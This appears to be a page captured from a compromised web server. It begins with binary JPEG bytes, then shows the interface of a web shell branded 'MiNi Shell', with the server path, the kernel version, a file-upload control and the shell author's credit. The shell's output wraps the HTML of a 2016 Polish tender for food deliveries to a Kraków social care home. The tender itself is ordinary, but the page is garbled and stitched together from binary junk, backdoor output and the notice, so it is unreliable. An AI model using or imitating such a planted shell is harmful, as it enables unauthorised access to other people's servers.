JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160512/119990-N-2016.html

<p class="kh_header"><b>Kraków: Dostawa artykułów żywnościowych dla DPS w okresie: VII - XII 2016 r.</b><br>
<b>Numer ogłoszenia: 119990 - 2016; data zamieszczenia: 12.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej im. św. Brata Alberta w Krakowie , ul. Adolfa Nowaczyńskiego 1, 30-336 Kraków, woj. małopolskie, tel. 12 255 41 61, faks 12 2691057.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.dpsnowaczynskiego.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Opieka społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla DPS w okresie: VII - XII 2016 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów żywnościowych dla DPS w okresie: VII - XII 2016 r.
Część A: Dostawa mięsa i jego przetworów dla DPS w okresie: VII - XII 2016 r.
Dostawy mięsa i jego przetworów w okresie od 01.07.2016 r. do 31.12.2016 r.: mięso wołowe i wieprzowe - łącznie 1656 kg, wędliny - łącznie 2322 kg, mięso drobiowe - łącznie 2022 kg, wędliny drobiowe - łącznie 489 kg;
Część B: Dostawa mleka i jego przetworów dla DPS w okresie: VII - XII 2016 r.
Dostawy mleka i jego przetworów w okresie od 01.07.2016 r. do 31.12.2016 r.: mleko, śmietana - łącznie 11760 L, masło, margaryna - łącznie 1200 kg, sery różne - łącznie 1989 kg, jogurt, kefir, zsiadłe mleko- łącznie 1380 L, mleko pełne w proszku 12 kg;
Część C: Dostawa pieczywa dla DPS w okresie: VII - XII 2016 r.
Dostawy pieczywa w okresie od 01.07.2016 r. do 31.12.2016 r.: chleb krakowski, graham - łącznie 13380 szt., bułki pszenne, weki - łącznie 50640 szt., bułka tarta - 180 kg, placek drożdżowy - 144 kg, pączek - 1560 szt.;
Część D: Dostawa różnych artykułów spożywczych dla DPS w okresie: VII - XII 2016 r.
Dostawy różnych artykułów spożywczych w okresie od 01.07.2016 r. do 31.12.2016 r.: cukier, cukier puder, cukier waniliowy, miód  - łącznie 1292 kg, herbata, kawa, kakao  - łącznie 1578 szt., makaron - 480 kg, mąka pszenna tortowa, mąka krupczatka, mąka ziemniaczana - łącznie 810 kg, kasze różne, ryż, płatki - łącznie 900 kg, musztarda, majonez  -  łącznie 690 szt., olej, - 240 L, frytura - 18 kg, przyprawy - łącznie ok. 2328 szt., pieczywo cukiernicze  - łącznie 205 kg, przetwory owocowe i warzywne - łącznie ok. 11244 szt., masa kajmakowa - 120 szt., jaja - 17280 szt;
Część E: Dostawa warzyw i owoców dla DPS w okresie: X - XII 2016 r.
Dostawa warzyw i owoców od 01.10.2016 r. do 31.12.2016 r.: warzywa, owoce - marchew, buraki, seler, pietruszka korzeń, kapusta, cebula - łącznie 2715 kg, ziemniaki 4725 kg, kapusta kiszona, ogórki kiszone  - łącznie 420 kg, sałata, por, brokuł, szczypiorek, czosnek - łącznie ok. 855 szt., ogórek zielony, pomidor - łącznie 300 kg, koper zielony, pietruszka zielona, - łącznie 36 kg, pieczarka - 30 kg, jabłka - 1440 kg, papryka czerwona - 30 kg;
Dostawa warzyw i owoców pozostałych: VII - IX 2016 r.
Dostawa warzyw i owoców pozostałych od 01.07.2016 r. do 30.09.2016 r.: warzywa, owoce - kapusta młoda, czerwona, włoska - łącznie 515 kg, kalafior młody, brokuł - łącznie 525 szt., pietruszka, seler korzeń - łącznie 270 kg, sałata, rzodkiewka  - łącznie 520 szt., marchew młoda obcinana, burak młody obcinany - łącznie 1200 kg, cebula młoda obcinana - 180 kg, pomidor, ogórek zielony - łącznie 560 kg, szczypiorek / cebula zielona - 200 pęczków, pietruszka, koperek ziel. - łącznie 27 kg , fasolka, cukinia, papryka - łącznie 280 kg, ziemniaki - 4800 kg, pieczarki - 30 kg, owoce; śliwka, jabłka, brzoskwinia, truskawka - łącznie 560 kg; 
Część F: Dostawa warzyw i owoców mrożonych oraz ryb w okresie: VII - XII 2016 r. Dostawa warzyw, owoców i ich przetworów oraz ryb od 01.07.2016 r. do 31.12.2016 r.: warzywa i owoce mrożone, ryby - warzywa i owoce mrożone - łącznie 2550 kg, ryby mrożone - 480 kg, makrela wędzona - 108 kg, tuńczyk w kawałkach, szprot w pomidorach, w oleju, filet z makreli w pomidorach, w oleju - łącznie 2280 szt., śledź solony matjas - 96 kg, karp patroszony, bez głowy - 30 kg;
Część G: Dostawa owoców - cytrusów dla DPS w okresie: X - XII 2016 r.
Dostawa owoców - cytrusów od 01.10.2016 r. do 31.12.2016 r.: owoce -  cytrusy; mandarynka - 225 kg, kiwi - 60 kg, banan - 162 kg, cytryna - 24 kg.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.50.00.00-3, 15.81.00.00-9, 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1, 15.20.00.00-0, 15.40.00.00-2, 03.20.00.00-3, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena w oparciu o podpisane oświadczenie Wykonawcy (Załącznik Nr 3 do SIWZ) - zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena w oparciu o podpisane oświadczenie Wykonawcy (Załącznik Nr 3 do SIWZ) - zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena w oparciu o podpisane oświadczenie Wykonawcy (Załącznik Nr 3 do SIWZ) - zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena w oparciu o podpisane oświadczenie Wykonawcy (Załącznik Nr 3 do SIWZ) - zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena w oparciu o podpisane oświadczenie Wykonawcy (Załącznik Nr 3 do SIWZ) - zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Określone są w pkt X SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od daty powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia należnego z tytułu wykonania części umowy.
2.Nie wszystkie rodzaje produktów muszą być zakupione lub zakupione w pełnym zakresie ilościowym. Ilość zamawianych towarów może ulec obniżeniu np. w razie zmniejszenia się liczby osób korzystających z wyżywienia oraz w związku z ustaleniami w jadłospisach. Zamówienie artykułów w mniejszej ilości, niż podane w zestawieniu ilościowo-asortymentowym w ofercie nie może być powodem roszczeń Wykonawcy w stosunku do Zamawiającego.
3.Zamawiający dopuszcza zmianę wynagrodzenia brutto w przypadku zmiany stawki VAT w ramach niniejszej umowy. Zmiana ta następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę.
4.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy, w przypadku  nieprzewidzianych, incydentalnych potrzeb Zamawiającego. Przedmiotowa zmiana postanowień umowy nie może powodować zwiększenia wynagrodzenia brutto o więcej niż 5 %.
5.Ceny jednostkowe netto określone w Załączniku Nr 1 do umowy nie mogą ulec zwiększeniu w okresie obowiązywania umowy.
6.Wykonawca zobowiązuje się do zapewnienia ciągłości dostaw w okresie trwania umowy. W przypadku wystąpienia okoliczności niezależnych od Wykonawcy (np.: zaprzestanie produkcji, brak importu do Polski, wprowadzenie nowego asortymentu w miejsce dotychczas produkowanego), Wykonawca niezwłocznie zaproponuje Zamawiającemu zamienny produkt o nie gorszych właściwościach niż dotychczas dostarczany. Cena zamiennego produktu nie może być wyższa od ceny produktu objętego niniejszą umową. 
7.W sytuacji gdy na rynku obrotu asortymentem stanowiącym przedmiot dostaw, brak będzie również produktów zamiennych a są produkty, których cena rynkowa w sposób znaczący jest wyższa od produktu objętego umową (sprzedaż w cenie z umowy groziłaby powstaniem rażącej straty u Wykonawcy), Wykonawca niezwłocznie poinformuje o tym Zamawiającego, załączając do pisma dokumenty na dowód istnienia takiej sytuacji, przedstawiając uzasadnienie wystąpienia ewentualnej rażącej straty po jego stronie. 
8.Zmiana produktów na zasadach, o których mowa w ust. 6 lub ust. 7 jest możliwa wyłącznie za pisemną zgodą Zamawiającego. 
9.W trakcie obowiązywania umowy, dopuszcza się również w uzasadnionych wypadkach, zmianę wielkości opakowania dostarczanego przedmiotu zamówienia. Zmiana wielkości opakowania nie może mieć wpływu na zmianę ogólnej ilości (kg, szt.) produktów objętych przedmiotową umową. Zmiana może nastąpić po uprzedniej, pisemnej akceptacji Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsnowaczynskiego.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej im. św. Brata Alberta, 30-336 Kraków, ul. Nowaczyńskiego 1, Dział Żywienia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2016 godzina 08:45, miejsce: Dom Pomocy Społecznej im. św. Brata Alberta, 30-336 Kraków, ul. Nowaczyńskiego 1, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część A: Dostawa mięsa i jego przetworów dla DPS w okresie: VII - XII 2016 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy mięsa i jego przetworów w okresie od 01.07.2016 r. do 31.12.2016 r.: mięso wołowe i wieprzowe - łącznie 1656 kg, wędliny - łącznie 2322 kg, mięso drobiowe - łącznie 2022 kg, wędliny drobiowe - łącznie 489 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część B: Dostawa mleka i jego przetworów dla DPS w okresie: VII - XII 2016 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy mleka i jego przetworów w okresie od 01.07.2016 r. do 31.12.2016 r.: mleko, śmietana - łącznie 11760L, masło, margaryna - łącznie 1200 kg, sery różne - łącznie 1989 kg, jogurt, kefir, zsiadłe mleko- łącznie 1380 L, mleko pełne w proszku 12 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część C: Dostawa pieczywa dla DPS w okresie: VII - XII 2016 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy pieczywa w okresie od 01.07.2016 r. do 31.12.2016 r.: chleb krakowski, graham - łącznie 13380 szt., bułki pszenne, weki - łącznie 50640 szt., bułka tarta - 180 kg, placek drożdżowy - 144 kg, pączek - 1560 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część D: Dostawa różnych artykułów spożywczych dla DPS w okresie: VII - XII 2016 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy różnych artykułów spożywczych w okresie od 01.07.2016 r. do 31.12.2016 r.: cukier, cukier puder, cukier waniliowy, miód  - łącznie 1292 kg, herbata, kawa, kakao  - łącznie 1578 szt., makaron - 480 kg, mąka pszenna tortowa, mąka krupczatka, mąka ziemniaczana - łącznie 810 kg, kasze różne, ryż, płatki - łącznie 900 kg, musztarda, majonez  -  łącznie 690 szt., olej, - 240 L, frytura - 18 kg, przyprawy - łącznie ok. 2328 szt., pieczywo cukiernicze  - łącznie 205 kg, przetwory owocowe i warzywne - łącznie ok. 11244 szt., masa kajmakowa - 120 szt., jaja - 17280 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.86.00.00-4, 15.40.00.00-2, 15.33.00.00-0, 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część E: Dostawa warzyw i owoców dla DPS w okresie: VII - XII 2016 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa warzyw i owoców od 01.10.2016 r. do 31.12.2016 r.: warzywa, owoce - marchew, buraki, seler, pietruszka korzeń, kapusta, cebula - łącznie 2715 kg, ziemniaki 4725 kg, kapusta kiszona, ogórki kiszone  - łącznie 420 kg, sałata, por, brokuł, szczypiorek, czosnek - łącznie ok. 855 szt., ogórek zielony, pomidor - łącznie 300 kg, koper zielony, pietruszka zielona, - łącznie 36 kg, pieczarka - 30 kg, jabłka - 1440 kg, papryka czerwona - 30 kg;
Dostawa warzyw i owoców pozostałych od 01.07.2016 r. do 30.09.2016 r.: warzywa, owoce - kapusta młoda, czerwona, włoska - łącznie 515 kg, kalafior młody, brokuł - łącznie 525 szt., pietruszka, seler korzeń - łącznie 270 kg, sałata, rzodkiewka  - łącznie 520 szt., marchew młoda obcinana, burak młody obcinany - łącznie 1200 kg, cebula młoda obcinana - 180 kg, pomidor, ogórek zielony - łącznie 560 kg, szczypiorek / cebula zielona - 200 pęczków, pietruszka, koperek ziel. - łącznie 27 kg , fasolka, cukinia, papryka - łącznie 280 kg, ziemniaki - 4800 kg, pieczarki - 30 kg, owoce; śliwka, jabłka, brzoskwinia, truskawka - łącznie 560 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część F: Dostawa warzyw i owoców mrożonych oraz ryb w okresie: VII - XII 2016 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa warzyw, owoców i ich przetworów oraz ryb od 01.07.2016 r. do 31.12.2016 r.: warzywa i owoce mrożone, ryby - warzywa i owoce mrożone - łącznie 2550 kg, ryby mrożone - 480 kg, makrela wędzona - 108 kg, tuńczyk w kawałkach, szprot w pomidorach, w oleju, filet z makreli w pomidorach, w oleju - łącznie 2280 szt., śledź solony matjas - 96 kg, karp patroszony, bez głowy - 30 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.33.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część G: Dostawa owoców - cytrusów dla DPS w okresie: X - XII 2016 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa owoców - cytrusów od 01.10.2016 r. do 31.12.2016 r.:owoce - cytrusy; mandarynka - 225 kg, kiwi - 60 kg, banan - 162 kg, cytryna - 24 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.21.10-7, 03.22.21.11-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com